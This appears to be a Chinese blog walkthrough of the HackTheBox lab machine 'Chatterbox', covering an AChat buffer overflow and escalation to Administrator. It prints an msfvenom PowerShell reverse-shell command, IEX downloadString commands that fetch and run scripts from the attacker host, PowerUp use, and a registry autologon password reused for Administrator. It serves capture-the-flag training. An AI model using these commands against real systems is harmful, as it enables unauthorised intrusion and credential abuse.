**
HackTheBox-windows-Chatterbox-Walkthrough
**
靶机地址:https://www.hackthebox.eu/home/machines/profile/123
靶机难度:中级(4.0/10)
靶机发布日期:2018年6月16日
靶机描述:
Chatterbox is a fairly straightforward machine that requires basic exploit modification or Metasploit troubleshooting skills to complete.
作者:大余
时间:2020-02-27
请注意:对于所有这些计算机,我是通过平台授权允许情况进行渗透的。我将使用Kali Linux作为解决该HTB的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。
一、信息收集
可以看到靶机的IP是10.10.10.74…
nmap发现运行了9255http的服务…还发现存在缓冲区溢出漏洞…
无法访问…400,回头发现运行了Achat服务器上…
存在漏洞,有个python能利用…试试
修改地址后…
可以看到这是建立在windows系统上的缓冲区溢出…这里可以利用powershell方向链接靶机…GO
命令:msfvenom -a x86 --platform Windows -p windows/powershell_reverse_tcp LHOST=10.10.14.18 LPORT=6666 -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python
利用achat漏洞创建windows上powershell的反向shell…但是问题来了,可以看到16974 bytes,Payload 3556,大于1100个字节就不能使用有效负荷了…继续修改…
生成MSFbuf…
准备好上传的shell…
将shell填入即可…
验证正常的…go
通过powershell反向shell成功上传了…获得了低权…
获得user.txt…
这里有点取巧了,目前我还在低权Alfred用户下,发现administrator下desktop的权限是可以看到root.txt文件的…但是我进去查看内容无法查看…看到我和system高权用户权限是一样的…
可以看到,这里直接在低权用户利用icacls获得了root信息…这是人员管理用户给权限的漏洞… (cacls Windows实用程序,用于查看/编辑文件权限)
虽然拿到了信息…但是还是要讲述怎么拿到system权限的…继续
目前具有PowerShell会话,可以使用PowerUp进行提权…
命令:git cloun https://github.com/PowerShellMafia/PowerSploit
下载后上传使用即可…
命令:IEX(NEW-Object Net.webClient).downloadString('http://10.10.14.18/dayu.ps1')
因为在powershell下,直接上传…
命令:Invoke-AllChecks
可以看到利用PowerUp看到了隐藏在注册表中的一组自动登录凭据…
DefaultUserName : Alfred
DefaultPassword : Welcome1!
这里创建一个凭据变量来存储密码…就是告诉PowerShell将先前找到的密码存储在纯文本中,并强制将其保存…
然后创建一个名为cred的新变量,并将其用于登录…
直接在利用提权的shell即可…
命令:Start-Process -FilePath "powershell" -argumentlist "IEX(New-Object Net.webClient).downloadString('http://10.10.14.18/dayushell.ps1')" -Credential $cred
可以看到成功获得了administrator用户权限…
通过尝试使用Administrator帐户重用此密码是成功的,使用powershell或打开SMB并使用impacket的psexec来实现了…完美
这里也能成功获得了root信息…
这里介绍了几种方法,大家多多操作,加油!
当然,开局的时候官方的给的方法是:Chatterbox是一台非常简单的机器,需要基本的漏洞利用修改或Metasploit故障排除技能才能完成。
我这里没使用Metasploit进行渗透的…说明Metasploit肯定还有方式方法能进行提权…
这里有专研精神的,可以继续专研下去,这里可以利用Metasploit获得root信息…GO
由于我们已经成功得到root权限查看user.txt和root.txt,因此完成了简单靶机,希望你们喜欢这台机器,请继续关注大余后期会有更多具有挑战性的机器,一起练习学习。
如果你有其他的方法,欢迎留言。要是有写错了的地方,请你一定要告诉我。要是你觉得这篇博客写的还不错,欢迎分享给身边的人。
634
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
